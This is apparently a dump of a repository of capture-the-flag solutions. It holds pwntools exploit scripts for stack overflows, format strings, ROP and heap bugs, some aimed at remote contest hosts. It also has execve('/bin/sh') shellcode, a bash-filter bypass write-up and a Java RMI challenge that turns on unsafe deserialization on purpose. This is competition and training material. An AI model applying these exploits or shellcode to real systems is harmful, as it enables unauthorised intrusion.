| 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Lamp 9 | extends Artifact { 10 | private static final long serialVersionUID = 3224471417469864672L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/model/TeaSet.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class TeaSet 9 | extends Artifact { 10 | private static final long serialVersionUID = 3746032360504837381L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/model/Wand.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Wand 9 | extends Artifact { 10 | private static final long serialVersionUID = 2245343830983149775L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/model/Frog.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Frog 9 | extends Artifact { 10 | private static final long serialVersionUID = 1541961207696730155L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/model/Lamp.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Lamp 9 | extends Artifact { 10 | private static final long serialVersionUID = 3224471417469864672L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/model/TeaSet.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class TeaSet 9 | extends Artifact { 10 | private static final long serialVersionUID = 3746032360504837381L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/model/Wand.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Wand 9 | extends Artifact { 10 | private static final long serialVersionUID = 2245343830983149775L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/model/Cauldron.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Cauldron 9 | extends Artifact { 10 | private static final long serialVersionUID = -2089840597819821199L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/model/Mirror.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Mirror 9 | extends Artifact { 10 | private static final long serialVersionUID = -5693218123114522907L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/model/Cauldron.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Cauldron 9 | extends Artifact { 10 | private static final long serialVersionUID = -2089840597819821199L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/model/Mirror.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Mirror 9 | extends Artifact { 10 | private static final long serialVersionUID = -5693218123114522907L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/model/Broomstick.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Broomstick 9 | extends Artifact { 10 | private static final long serialVersionUID = -7101213341880981833L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/model/Broomstick.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Broomstick 9 | extends Artifact { 10 | private static final long serialVersionUID = -7101213341880981833L; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /meepwn-2018/baby-sandbox/code.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void func() { 5 | register int esp asm("esp"); 6 | if ((esp >= (0x1000000 + 0x200000)) && 7 | (esp <= (0x1000000 + 0x200100)) ) { 8 | asm("mov $1, %eax"); 9 | asm("int $0x80"); 10 | } 11 | } 12 | 13 | int main() { 14 | func(); 15 | return 0; 16 | } 17 | -------------------------------------------------------------------------------- /tuctf-2018/canary/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.terminal = ['tmux', 'splitw', '-h'] 4 | context.log_level = 'debug' 5 | 6 | #p = process("./canary") 7 | #gdb.attach(p) 8 | p = remote("18.222.227.1", 12345) 9 | 10 | payload = "a"*0x28 + p32(1) + p32((0x100000000 + (0x0804A06C - 0x0804A0A0))/4) + \ 11 | p32(0x80486C1)*10 12 | p.sendline(payload) 13 | 14 | p.interactive() 15 | -------------------------------------------------------------------------------- /insomni-hack-18/sapeloshop/footer.html: -------------------------------------------------------------------------------- 1 | 2 |
3 | 4 | 5 | 6 |
7 |
8 |

©Jackie Stewart. Gabao RPZ à point 0.

9 |
10 |
11 | 12 | 13 | -------------------------------------------------------------------------------- /insomni-hack-17/babyfirst/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | p = process("./babyfirst") 4 | 5 | p.recvuntil("Your name please?") 6 | p.sendline("Dhaval"); 7 | 8 | p.recvuntil("Your last wish before dying?") 9 | 10 | flag_addr = 0x602080 11 | payload = p64(flag_addr)*300 12 | 13 | p.sendline(payload); 14 | 15 | p.recvuntil("stack smashing detected ***: ") 16 | 17 | log.info(p.recvuntil(" ").strip()) 18 | 19 | p.close() 20 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/.project: -------------------------------------------------------------------------------- 1 | 2 | 3 | magichat-client 4 | 5 | 6 | 7 | 8 | 9 | org.eclipse.jdt.core.javabuilder 10 | 11 | 12 | 13 | 14 | 15 | org.eclipse.jdt.core.javanature 16 | 17 | 18 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/.project: -------------------------------------------------------------------------------- 1 | 2 | 3 | magichat-server 4 | 5 | 6 | 7 | 8 | 9 | org.eclipse.jdt.core.javabuilder 10 | 11 | 12 | 13 | 14 | 15 | org.eclipse.jdt.core.javanature 16 | 17 | 18 | -------------------------------------------------------------------------------- /tuctf-2018/lisa/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.terminal = ['tmux', 'splitw', '-h'] 4 | context.log_level = 'debug' 5 | 6 | #p = process("./lisa") 7 | #gdb.attach(p) 8 | p = remote("18.191.244.121", 12345) 9 | 10 | p.recvuntil("share: ") 11 | heap_leak = int(p.recvline()[2:], 16) 12 | log.info(hex(heap_leak)) 13 | p.recvuntil("you alright...") 14 | 15 | payload = p32(0) + p32(heap_leak) + p32(0x20) 16 | p.send(payload) 17 | 18 | p.recvuntil("mouth?") 19 | payload = "a"*0x1c + "\x15" # read 20 | p.send(payload) 21 | p.send("\x00") 22 | p.interactive() 23 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/.classpath: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /codegate-2018/zoo/structs.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | struct feed { 4 | char *str; 5 | uint64_t padding; 6 | char medicine_name[8]; 7 | char medicine_desc[120]; 8 | }; 9 | 10 | struct animal { 11 | uint32_t initalized; 12 | char name[20]; 13 | struct feed *feeds[20]; 14 | char *species; 15 | char *dungs[25]; 16 | uint32_t likes; 17 | uint32_t feed_index2; 18 | uint32_t feed_index; 19 | uint32_t dung_index2; 20 | uint32_t dung_index; 21 | uint32_t is_ill; 22 | uint32_t feed_flag_ill; 23 | }; 24 | 25 | struct zoo { 26 | char name[16]; 27 | struct animal animals[5]; 28 | }; 29 | -------------------------------------------------------------------------------- /csaw-ctf-2013/exploitation-2/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | shellcode = asm(pwnlib.shellcraft.i386.linux.readfile("./key", 4)) 4 | 5 | # p = process("./exploit2") 6 | # gdb.attach(p) 7 | 8 | conn = remote("localhost", 31338) 9 | 10 | buffer_addr = u32(conn.recvn(4)) 11 | canary = u32(conn.recvn(4)) 12 | 13 | log.info("BUF_ADDR: " + str(hex(buffer_addr))) 14 | 15 | payload = shellcode.ljust(2048, "a") 16 | payload += p32(canary) 17 | payload += "a"*4 # ebx 18 | payload += "a"*4 # edi 19 | payload += "a"*4 # ebp 20 | payload += p32(buffer_addr) 21 | 22 | conn.sendline(payload) 23 | 24 | conn.interactive() 25 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/WizardAPI.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt; 5 | 6 | import ch.scrt.model.Hat; 7 | import java.rmi.Remote; 8 | import java.rmi.RemoteException; 9 | import org.apache.commons.lang3.tuple.Pair; 10 | 11 | public interface WizardAPI 12 | extends Remote { 13 | public static final int PORT = 51966; 14 | public static final String IP = "magichat.teaser.insomnihack.ch"; 15 | 16 | public String message(int var1) throws RemoteException; 17 | 18 | public Hat getMagicHat() throws RemoteException; 19 | 20 | public Pair castASpell(Hat var1) throws RemoteException; 21 | } 22 | 23 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/WizardAPI.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt; 5 | 6 | import ch.scrt.model.Hat; 7 | import java.rmi.Remote; 8 | import java.rmi.RemoteException; 9 | import org.apache.commons.lang3.tuple.Pair; 10 | 11 | public interface WizardAPI 12 | extends Remote { 13 | public static final int PORT = 51966; 14 | public static final String IP = "magichat.teaser.insomnihack.ch"; 15 | 16 | public String message(int var1) throws RemoteException; 17 | 18 | public Hat getMagicHat() throws RemoteException; 19 | 20 | public Pair castASpell(Hat var1) throws RemoteException; 21 | } 22 | 23 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/Server.java: -------------------------------------------------------------------------------- 1 | package ch.scrt; 2 | 3 | import java.rmi.Naming; 4 | import java.rmi.registry.LocateRegistry; 5 | 6 | public class Server { 7 | public static void main(String[] args) { 8 | try { 9 | System.setProperty("org.apache.commons.collections.enableUnsafeSerialization", "true"); 10 | System.out.println("Server ready"); 11 | WizardAPIImpl w = new WizardAPIImpl(); 12 | System.out.println("Server ready2"); 13 | LocateRegistry.createRegistry(2020); 14 | Naming.bind("rmi://localhost:2020/Wizard", w); 15 | System.out.println("Server ready3"); 16 | } catch (Exception e) { 17 | System.out.println("Exception: " + e.toString()); 18 | } 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/.classpath: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/model/Scroll.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Scroll 9 | extends Artifact { 10 | private static final long serialVersionUID = -8302681252939001444L; 11 | private String content = " ____________________________\n()==( (@==()\n '___________________________'|\n | |\n | *unintelligible runes* |\n __)__________________________|\n()==( (@==()\n '---------------------------'"; 12 | 13 | @Override 14 | public String toString() { 15 | return super.toString() + "\n[" + this.content + "]"; 16 | } 17 | } 18 | 19 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/model/Scroll.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | 8 | public class Scroll 9 | extends Artifact { 10 | private static final long serialVersionUID = -8302681252939001444L; 11 | private String content = " ____________________________\n()==( (@==()\n '___________________________'|\n | |\n | *unintelligible runes* |\n __)__________________________|\n()==( (@==()\n '---------------------------'"; 12 | 13 | @Override 14 | public String toString() { 15 | return super.toString() + "\n[" + this.content + "]"; 16 | } 17 | } 18 | 19 | -------------------------------------------------------------------------------- /csaw-ctf-2013/exploitation-3/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # Need to run multiple times 4 | 5 | bin = ELF("fil_chal") 6 | p = process("./fil_chal") 7 | 8 | shellcode = asm(pwnlib.shellcraft.i386.linux.readfile("./key", 4)) 9 | random_stack_addr = 0xff88a534 10 | 11 | conn = remote("localhost", 34266) 12 | 13 | conn.sendline("csaw2013") 14 | conn.sendline("S1mplePWD") 15 | 16 | conn.recvuntil("Entry") 17 | conn.sendline("-1") 18 | 19 | payload = "a"*0x41c 20 | payload += "a"*4 21 | log.info(hex(bin.symbols['recv'])) 22 | # Overwriting return address 23 | payload += p32(bin.symbols['recv']) 24 | payload += p32(random_stack_addr) 25 | payload += p32(4) 26 | payload += p32(random_stack_addr) 27 | payload += p32(100) 28 | payload += p32(0) 29 | 30 | conn.sendline(payload) 31 | 32 | conn.sendline(shellcode) 33 | 34 | conn.interactive() -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/model/Hat.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import ch.scrt.model.Artifact; 7 | import org.apache.commons.collections.Bag; 8 | import org.apache.commons.collections.bag.HashBag; 9 | 10 | public class Hat 11 | extends Artifact { 12 | private static final long serialVersionUID = 2028004707566014564L; 13 | private Bag content = new HashBag(); 14 | 15 | public void add(Artifact a) { 16 | this.content.add(a); 17 | } 18 | 19 | @Override 20 | public String toString() { 21 | String str = super.toString(); 22 | if (!this.content.isEmpty()) { 23 | str = str + " that contains: \n" + this.content.toString().replace(":", "x ").replace(',', '\n'); 24 | } 25 | return str; 26 | } 27 | } 28 | 29 | -------------------------------------------------------------------------------- /securinets-2018/no-mercy/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | bin = ELF("./no_mercy") 7 | 8 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc.so.6")} 9 | 10 | p = remote("52.50.127.68", 44444) 11 | 12 | #p = process("./no_mercy", env=env) 13 | #gdb.attach(p) 14 | 15 | leak_addr = 0x08048573 16 | payload = "a"*6 + \ 17 | "LIBC_FATAL_STDERR_=1".ljust(0x20, "1")*3 18 | payload = payload.ljust(234, "a") 19 | payload += p32(leak_addr) + \ 20 | "a"*4 + \ 21 | p32(0xffffd830) 22 | payload += "LIBC_FATAL_STDERR_=1".ljust(0x20, "1")*50 23 | p.sendline(payload) 24 | p.sendline("b") 25 | 26 | p.recvuntil("stack smashing detected ***: ") 27 | a = p.recvuntil(" terminated") 28 | 29 | print(a.encode('hex')) 30 | 31 | p.interactive() 32 | -------------------------------------------------------------------------------- /securinets-2018/protect/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | bin = ELF("./protect") 7 | 8 | #conn = process("./protect") 9 | #gdb.attach(conn) 10 | conn = remote("34.242.96.216", 11111) 11 | 12 | pop7_gadget = 0x080485c5 13 | pop3_gadget = 0x080485c9 14 | ret_gadget = 0x0804833a 15 | 16 | shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" 17 | 18 | payload = p32(pop7_gadget) + \ 19 | p32(ret_gadget)*10 + \ 20 | p32(bin.symbols['read']) + \ 21 | p32(0x30303030) + \ 22 | p32(0) + \ 23 | p32(0x30303030) + \ 24 | p32(len(shellcode)) 25 | 26 | conn.send(payload.ljust(0x400, "\x00")) 27 | 28 | conn.send(shellcode) 29 | 30 | conn.interactive() 31 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/model/Hat.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import org.apache.commons.collections.Bag; 7 | import org.apache.commons.collections.bag.HashBag; 8 | 9 | import ch.scrt.model.Artifact; 10 | 11 | public class Hat 12 | extends Artifact { 13 | private static final long serialVersionUID = 2028004707566014564L; 14 | private Bag content = new HashBag(); 15 | 16 | public void add(Artifact a) { 17 | this.content.add(a); 18 | } 19 | 20 | @Override 21 | public String toString() { 22 | String str = super.toString(); 23 | if (!this.content.isEmpty()) { 24 | str = str + " that contains: \n" + this.content.toString().replace(":", "x ").replace(',', '\n'); 25 | } 26 | return str; 27 | } 28 | } 29 | 30 | -------------------------------------------------------------------------------- /securinets-2018/special/writeup: -------------------------------------------------------------------------------- 1 | It looks like a lot of characters are filtered out. 2 | 3 | Running this reveals chars which are left: 4 | ;1234567890-=qwertyuiop[]\asdfghjkl;'zxcvbnm,./`~!@#$%^&*()_+QWERTYUIOP{}|ASDFGHJKL:"ZXCVBNM<>? 5 | bash: -c: line 0: syntax error near unexpected token `;' 6 | bash: -c: line 0: `;-;#$^_+QWERTYUIOP{}|ASDFGHJKL:ZXCVBNM<>' 7 | 8 | Let's check the environment variable `_`: 9 | > `${_}` 10 | declare -x A="T" 11 | declare -x AB="HI" 12 | declare -x ABC="ISN" 13 | declare -x ABCD="OTTH" 14 | declare -x ABCDE="EFLAG" 15 | declare -x ABCDEF="BUTMAY" 16 | declare -x ABCDEFG="BEITCAN" 17 | declare -x ABCDEFGH="HELPGETT" 18 | declare -x ABCDEFGHI="INGFLAG:D" 19 | declare -x OLDPWD 20 | declare -x PWD="/home/special" 21 | declare -x SHELL="" 22 | declare -x SHLVL="1" 23 | declare -x _="export" 24 | 25 | Finally: ${PWD:${#ABCDEF}:${#A}}${PWD:${#A}:${#A}} 26 | ^ parses to 'sh' 27 | 28 | Flag{B4sh_subst1tut1on_is_gud!} 29 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/WizardAPIImpl.java: -------------------------------------------------------------------------------- 1 | package ch.scrt; 2 | 3 | import java.rmi.RemoteException; 4 | import java.rmi.server.UnicastRemoteObject; 5 | 6 | import org.apache.commons.lang3.tuple.MutablePair; 7 | import org.apache.commons.lang3.tuple.Pair; 8 | 9 | import ch.scrt.model.Hat; 10 | 11 | public class WizardAPIImpl extends UnicastRemoteObject implements WizardAPI { 12 | 13 | /** 14 | * 15 | */ 16 | private static final long serialVersionUID = 1689583531382468090L; 17 | 18 | protected WizardAPIImpl() throws RemoteException { 19 | super(); 20 | } 21 | 22 | @Override 23 | public String message(int var1) throws RemoteException { 24 | return "SERVER_MESSAGE"; 25 | } 26 | 27 | @Override 28 | public Hat getMagicHat() throws RemoteException { 29 | return new Hat(); 30 | } 31 | 32 | @Override 33 | public Pair castASpell(Hat var1) throws RemoteException { 34 | return null; 35 | } 36 | 37 | } 38 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/client/src/ch/scrt/model/Artifact.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import java.io.Serializable; 7 | 8 | public abstract class Artifact 9 | implements Serializable { 10 | private static final long serialVersionUID = 5612698299188628963L; 11 | private Essence essence = Essence.ORDINARY; 12 | 13 | Artifact() { 14 | } 15 | 16 | public String toString() { 17 | return this.essence.name().toLowerCase() + " " + this.getClass().getSimpleName().toLowerCase(); 18 | } 19 | 20 | public boolean equals(Object o) { 21 | return this.toString().equals(o.toString()); 22 | } 23 | 24 | public int hashCode() { 25 | return this.toString().hashCode(); 26 | } 27 | 28 | private static enum Essence { 29 | ORDINARY, 30 | MAGIC; 31 | 32 | 33 | private Essence() { 34 | } 35 | } 36 | 37 | } 38 | 39 | -------------------------------------------------------------------------------- /insomni-hack-18/magichat/server/src/ch/scrt/model/Artifact.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Decompiled with CFR 0_124. 3 | */ 4 | package ch.scrt.model; 5 | 6 | import java.io.Serializable; 7 | 8 | public abstract class Artifact 9 | implements Serializable { 10 | private static final long serialVersionUID = 5612698299188628963L; 11 | private Essence essence = Essence.ORDINARY; 12 | 13 | Artifact() { 14 | } 15 | 16 | public String toString() { 17 | return this.essence.name().toLowerCase() + " " + this.getClass().getSimpleName().toLowerCase(); 18 | } 19 | 20 | public boolean equals(Object o) { 21 | return this.toString().equals(o.toString()); 22 | } 23 | 24 | public int hashCode() { 25 | return this.toString().hashCode(); 26 | } 27 | 28 | private static enum Essence { 29 | ORDINARY, 30 | MAGIC; 31 | 32 | 33 | private Essence() { 34 | } 35 | } 36 | 37 | } 38 | 39 | -------------------------------------------------------------------------------- /securinets-2018/format-me/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | bin = ELF("./format") 7 | 8 | p = process("./format") 9 | gdb.attach(p, """ 10 | break *0x0804863e 11 | """) 12 | 13 | """ 14 | 0xff8a21c0: 0xff8a22b4 0xff8a21ec 0xf77575a0 0x08048563 <- 3 15 | 0xff8a21d0: 0x00000007 0xf7798c08 0x6e43a318 0xff8a2444 <- 7 16 | 0xff8a21e0: 0x00000000 0x00000000 0xf77731a0 0x61616161 <- 11 17 | 0xff8a21f0: 0x61616161 0x78383025 0x3830252d 0xff000a78 18 | 0xff8a2200: 0x00000001 0x00000000 0xf7798000 0xf77002a2 19 | """ 20 | 21 | payload = fmtstr_payload(11, 22 | { 23 | bin.got['exit']: 0xfffe514a + 0x1000 24 | }, 25 | 0xf6 - 0xef, 26 | write_size='short' 27 | ) 28 | 29 | log.info(payload.encode('hex')) 30 | p.sendline(payload) 31 | 32 | p.interactive() 33 | -------------------------------------------------------------------------------- /hacklu-2017/multi-o-flow/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | file = "./mult-o-flow" 4 | 5 | bin = ELF(file) 6 | 7 | sh_addr = bin.symbols['player'] 8 | system_addr = bin.symbols['system'] 9 | canary = 0x112233 10 | 11 | conn = process(file) 12 | 13 | # Overflow into scrape_flag 14 | conn.send("sh" + "\x00"*62) 15 | 16 | conn.recvuntil(":-)\n") 17 | 18 | isp = "ISP:" + "a"*9 # Should start at temp_buf at first sprintf 19 | isp = isp.ljust(0x200 - len("City:") - 9 + len("ISP:") + 9, "b") 20 | 21 | city = "City:" + "c"*9 # Should start at temp_buf at second sprintf 22 | city += "d"*4 + p32(canary)[:3] + "<" # This '<' will be become 0 in 1st sprintf 23 | 24 | # After 1st sprintf, city string will be at start of temp_buf, with a NULL at 25 | # the 8th byte. sprintf will stop copying city here! But the next '<' will still 26 | # be overwritten with 0. 27 | city += "e"*16 + p32(system_addr)[0:3] + "<" 28 | 29 | payload = "p"*(0x1000 + 0x200 - len("ISP:") - 9) 30 | payload += isp 31 | payload += city 32 | payload += "f"*4 33 | payload += p32(sh_addr)[0:3] 34 | 35 | #gdb.attach(conn) 36 | conn.send(payload) 37 | 38 | conn.interactive() 39 | -------------------------------------------------------------------------------- /hacklu-2017/exam/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | file = './exam' 4 | 5 | #context.log_level = 'debug' 6 | context.terminal = ['tmux', 'splitw', '-h'] 7 | 8 | #conn = gdb.debug(file) 9 | conn = process(file) 10 | 11 | def add_sum(sum): 12 | conn.recvuntil("> ") 13 | conn.sendline("1") 14 | conn.recvuntil(":-)\n> ") 15 | conn.send(sum) 16 | 17 | def remove_sum(i): 18 | conn.recvuntil("> ") 19 | conn.sendline("2") 20 | conn.recvuntil("remove?\n> ") 21 | conn.sendline(str(i)) 22 | 23 | def create_crib(): 24 | conn.recvuntil(">") 25 | conn.sendline("4") 26 | conn.recvuntil("Result") 27 | 28 | def tear_crib(): 29 | conn.recvuntil(">") 30 | conn.sendline("5") 31 | conn.recvuntil("awesome, didn't it? :-)") 32 | 33 | #add_sum(p64(144) * (128/8) + "\n") 34 | add_sum("a"*127 + "\n") 35 | add_sum("e"*127 + "\n") 36 | add_sum("b"*127 + "\n") 37 | add_sum("c"*127 + "\n") 38 | add_sum("d"*127 + "\n") 39 | 40 | remove_sum(2) 41 | 42 | #add_sum("e"*127 + "\n") 43 | add_sum(p64(144*3) * (128/8) + "\x90") 44 | 45 | remove_sum(0) 46 | remove_sum(3) 47 | 48 | add_sum("a"*127 + "\n") 49 | create_crib() 50 | add_sum("ITSMAGIC"*8 + "/bin/sh" + "\n") 51 | 52 | conn.sendline("6") 53 | conn.sendline("2") 54 | 55 | conn.interactive() 56 | -------------------------------------------------------------------------------- /securinets-2018/boobs/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | bin = ELF("./boobs") 7 | 8 | #conn = process("./boobs") 9 | #gdb.attach(conn) 10 | conn = remote("34.242.96.216", 22222) 11 | 12 | def menu(choice): 13 | # conn.recvuntil("classroom") 14 | conn.sendline(str(choice)) 15 | 16 | def create(course, title, content): 17 | menu(1) 18 | #conn.recvuntil("Enter course number") 19 | conn.sendline(str(course)) 20 | # conn.recvuntil("Adding new course") 21 | conn.sendline(title) 22 | #conn.recvuntil("course content") 23 | conn.sendline(content) 24 | 25 | def edit(course, content): 26 | menu(1) 27 | #conn.recvuntil("Enter course number") 28 | conn.sendline(str(course)) 29 | # conn.recvuntil("course text") 30 | conn.sendline(content) 31 | 32 | def publish(): 33 | menu(3) 34 | 35 | #conn.recvuntil("new classroom:") 36 | conn.sendline("vampire") 37 | 38 | for i in range(1, 80): 39 | create(i, "a", "b") 40 | 41 | create(80, "a", "b") 42 | payload = "a"*258 + p32(bin.symbols['check']) 43 | edit(80, payload) 44 | create(81, "a", "b") 45 | payload = "a"*258 + p32(bin.symbols['get_boobs']) 46 | edit(81, payload) 47 | 48 | publish() 49 | 50 | conn.interactive() 51 | -------------------------------------------------------------------------------- /defcon-2015/babyecho/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | p = process("./babyecho") 4 | 5 | ''' 6 | Stack layout: 7 | 0 -> &buf (0x0) 8 | 1 -> v6 (temp) 9 | 2 -> 10 10 | 3 -> 0 11 | 4 -> v6 (0x10) 12 | 5 -> &buf 13 | 6 -> < flag, on 0 while loop breaks > 14 | 7 -> buf[0-4] (0x1c) 15 | . 16 | . 17 | . 18 | 263 -> canary (0x41c) 19 | 264 -> ebp 20 | 265 -> return address 21 | ''' 22 | 23 | p.recvuntil("bytes\n") 24 | 25 | log.info("Leaking address of buf") 26 | p.sendline("%5$x") 27 | addr_buf = int(p.recvline().strip(), 16) 28 | 29 | p.recvuntil("bytes\n") 30 | 31 | log.info("Updating v6 to 1100") 32 | writes = { addr_buf - 4*3 : 90 } 33 | payload = fmtstr_payload(7, writes, write_size='int') 34 | log.info("Payload: " + payload) 35 | p.sendline(payload) 36 | 37 | p.recvuntil("bytes\n") 38 | 39 | log.info("Overwriting return address with buf's addr: " + str(hex(addr_buf))) 40 | log.info("Overwriting flag with 1") 41 | writes = { 42 | addr_buf + 0x410: addr_buf % (256*256), 43 | addr_buf + 0x410 + 2: addr_buf / (256*256), 44 | addr_buf - 4: 50 45 | } 46 | payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" 47 | payload = payload.ljust(32, "a") 48 | payload += fmtstr_payload(7 + 8, writes, write_size='int', numbwritten=len(payload)) 49 | log.info("Payload: " + payload) 50 | p.sendline(payload) 51 | 52 | p.interactive() -------------------------------------------------------------------------------- /defcon-2015/r0pbaby/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.arch = 'amd64' 4 | # context.log_level = 'debug' 5 | 6 | p = process("r0pbaby") 7 | 8 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | bin_sh_offset = next(libc.search("/bin/sh")) 10 | pop_rdi_gadget_offset = next(libc.search(asm("pop rdi; ret"))) 11 | system_offset = libc.symbols['system'] 12 | 13 | def get_libc_base_address(): 14 | p.sendline("1") 15 | p.recvuntil(".so.6: ") 16 | addr = p.recvline().strip() 17 | return int(addr, 16) 18 | 19 | def get_libc_func_address(func): 20 | p.sendline("2") 21 | p.recvuntil("symbol: ") 22 | p.sendline(func) 23 | p.recvuntil(": ") 